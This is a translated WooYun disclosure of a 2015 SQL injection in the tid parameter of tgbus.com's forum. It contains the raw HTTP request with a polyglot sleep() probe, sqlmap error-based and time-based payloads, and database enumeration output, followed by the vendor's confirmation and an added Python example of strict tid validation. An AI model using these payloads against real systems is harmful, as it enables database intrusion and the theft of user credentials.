WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-03-26: Details sent to the vendor, awaiting the vendor's handling
2015-03-27: Vendor confirmed; details disclosed to the vendor only
2015-04-06: Details disclosed to core white hats and experts in the relevant field
2015-04-16: Details disclosed to regular white hats
2015-04-26: Details disclosed to intern white hats
2015-05-11: Details disclosed to the public
A vulnerability at 电玩巴士 (tgbus.com) could expose the account and password data of more than four million users
POST /forum.php?action=reply&extra=page%3D1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://dou.tgbus.com
Cookie: 7yB8_2132_saltkey=DctRkTCr; 7yB8_2132_lastvisit=1427287580; 7yB8_2132_sid=F55R5J; 7yB8_2132_lastact=1427296340%09member.php%09logging; 7yB8_2132_forum_lastvisit=D_105_1427291190D_435_1427291194D_225_1427291204D_495_1427291212D_212_1427291221D_50_1427291269D_40_1427291300D_242_1427296340; 7yB8_2132_visitedfid=242D39D484D40D50D467D486D441D222D475; 7yB8_2132__refer=%252Fhome.php%253Fac%253Dfriend%2526handlekey%253Daddfriendhk_15119828%2526mod%253Dspacecp%2526op%253Dadd%2526uid%253D15119828; 7yB8_2132_home_diymode=1; 7yB8_2132_sendmail=1; 7yB8_2132_fid39=1427291183; 7yB8_2132_fid242=1427291238; 7yB8_2132_fid40=1427291264
Host: dou.tgbus.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

formhash=1094aa0f&subject=
The tid parameter is vulnerable to SQL injection. URL-decoded, the value placed in tid is:
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
This is a time-based blind probe written as a polyglot: it stays syntactically valid whether the application splices tid into the query unquoted, inside single quotes, or inside double quotes. With sleep(0) it causes no delay and only checks that the expression is evaluated; sqlmap's confirming payload below uses SLEEP(5).
sqlmap retrieved the following database information:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT 3666 FROM(SELECT COUNT(*),CONCAT(0x7170717171,(SELECT (CASE WHEN (3666=3666) THEN 1 ELSE 0 END)),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GYHb'='GYHb'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: http://dou.tgbus.com:80/forum.php?action=reply&extra=page=1&fid=245&handlekey=fastpost&infloat=yes&mod=post&replysubmit=yes&tid=if(now()=sysdate(),sleep(0),0)/-9717' OR 2709=SLEEP(5) AND 'MOVQ'='MOVQ'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
web application technology: PHP 5.4.28
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] tgbus_dou_x2
The database has 241 tables; part of the listing follows:
web application technology: PHP 5.4.28
back-end DBMS: MySQL 5.0
Database: tgbus_dou_x2
[241 tables]
+------------------------------------+
| pre_baidusubmit_setting            |
| pre_baidusubmit_sitemap            |
| pre_baidusubmit_urlstat            |
| pre_common_addon                   |
| pre_common_admincp_cmenu           |
| pre_common_admincp_group           |
| pre_common_admincp_member          |
| pre_common_admincp_perm            |
| pre_common_admincp_session         |
| pre_common_admingroup              |
| pre_common_adminnote               |
| pre_common_advertisement           |
| pre_common_advertisement_custom    |
The pre_common_member table holds a large volume of user account data.
Roughly 4 million+ user account and password records. As proof I list only one record here, then terminated sqlmap. I stopped at that point and did not go any further!
1. Given how much information could be leaked, could I please be given 20 Rank? Finding bugs isn't easy! I am willing to keep finding bugs for free to help with the site's security.
2. Strictly filter the tid parameter!
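The two points above, the polyglot probe in tid and the request to filter tid strictly, are illustrated together in the following added example. It is not code from the original report or from the forum software. The three query templates, the table name pre_forum_thread and the in-memory SQLite rows are assumptions constructed for illustration (the forum's real query is not on the page); now(), sysdate() and sleep() are MySQL functions that are only inspected here, never executed. The small lexer shows what a SQL parser is left with once comments are dropped and string literals are collapsed, which is why the same probe is live in all three splice contexts, and validate_tid() plus a bound parameter is the strict filtering the reporter asks for.

```python
"""Added example, not part of the original WooYun report or the forum
software it describes.  Shows (1) why the polyglot probe placed in tid
parses as live SQL in three different splice contexts and (2) a strict
integer filter for tid followed by a bound parameter.  The query templates,
the table name pre_forum_thread and the in-memory SQLite rows are
assumptions constructed for illustration; now(), sysdate() and sleep() are
MySQL functions that are only inspected here, never executed."""
import re
import sqlite3

# The tid probe from the report's request, URL-decoded.
PAYLOAD = (
    "if(now()=sysdate(),sleep(0),0)"
    "/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"
    "\"XOR(if(now()=sysdate(),sleep(0),0))OR\"*/"
)

# Hypothetical ways an application might concatenate tid into SQL.
TEMPLATES = {
    "numeric": "SELECT subject FROM pre_forum_thread WHERE tid={tid}",
    "single_quoted": "SELECT subject FROM pre_forum_thread WHERE tid='{tid}'",
    "double_quoted": 'SELECT subject FROM pre_forum_thread WHERE tid="{tid}"',
}


def splice(context, tid):
    """Vulnerable pattern: build the statement by string formatting."""
    return TEMPLATES[context].format(tid=tid)


def lex(sql):
    """Tiny MySQL-style lexer returning (kind, text) with kind in
    {'code', 'str', 'comment'}.  Handles /* */ comments and '...' / "..."
    literals; backslash escapes are ignored because the probe has none."""
    tokens, buf, i = [], [], 0

    def flush():
        if buf:
            tokens.append(("code", "".join(buf)))
            buf.clear()

    while i < len(sql):
        if sql.startswith("/*", i):
            flush()
            end = sql.find("*/", i + 2)
            end = len(sql) if end < 0 else end + 2
            tokens.append(("comment", sql[i:end]))
            i = end
        elif sql[i] in "'\"":
            flush()
            end = sql.find(sql[i], i + 1)
            end = len(sql) if end < 0 else end + 1
            tokens.append(("str", sql[i:end]))
            i = end
        else:
            buf.append(sql[i])
            i += 1
    flush()
    return tokens


def shape(sql):
    """What the parser evaluates: comments dropped, literals collapsed to '?'."""
    return "".join("'?'" if kind == "str" else text
                   for kind, text in lex(sql) if kind != "comment")


def probe_is_live(context):
    """True when the sleep() probe ends up as executable code in this context."""
    return "if(now()=sysdate(),sleep(0),0)" in shape(splice(context, PAYLOAD))


def validate_tid(raw):
    """Strict filter for tid: accept only a positive decimal integer."""
    if not isinstance(raw, str) or not re.fullmatch(r"[1-9][0-9]{0,9}", raw):
        raise ValueError("tid must be a positive integer")
    return int(raw)


def demo_db():
    """Constructed stand-in for the forum thread table (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pre_forum_thread (tid INTEGER PRIMARY KEY, subject TEXT)")
    conn.executemany("INSERT INTO pre_forum_thread VALUES (?, ?)",
                     [(1, "welcome"), (245, "fastpost test")])
    return conn


def lookup_subject(conn, raw_tid):
    """Hardened lookup: validate first, then bind the value, never format it."""
    tid = validate_tid(raw_tid)
    row = conn.execute("SELECT subject FROM pre_forum_thread WHERE tid=?", (tid,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for ctx in TEMPLATES:
        print(f"{ctx:14s} live={probe_is_live(ctx)}  {shape(splice(ctx, PAYLOAD))}")
    conn = demo_db()
    print(lookup_subject(conn, "245"))
    try:
        lookup_subject(conn, PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

In the numeric context the parser sees only the if(...sleep(0)...) expression because everything after /* is a comment; in both quoted contexts the first quote closes the literal, XOR(...) OR runs as code, and the trailing quote pair swallows the rest. The Parameter: #1* line in the sqlmap output above is how sqlmap names a custom injection point marked with * in the URI, which is why its confirming payloads appear spliced into the middle of the reporter's probe.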
Severity: High
Vulnerability Rank: 12
Confirmed at: 2015-03-27 11:06
Thanks to white hat "netwind" for the kind heads-up. We have confirmed that this vulnerability is caused by some lax filtering rules in the forum software. A fix has been submitted. Many thanks.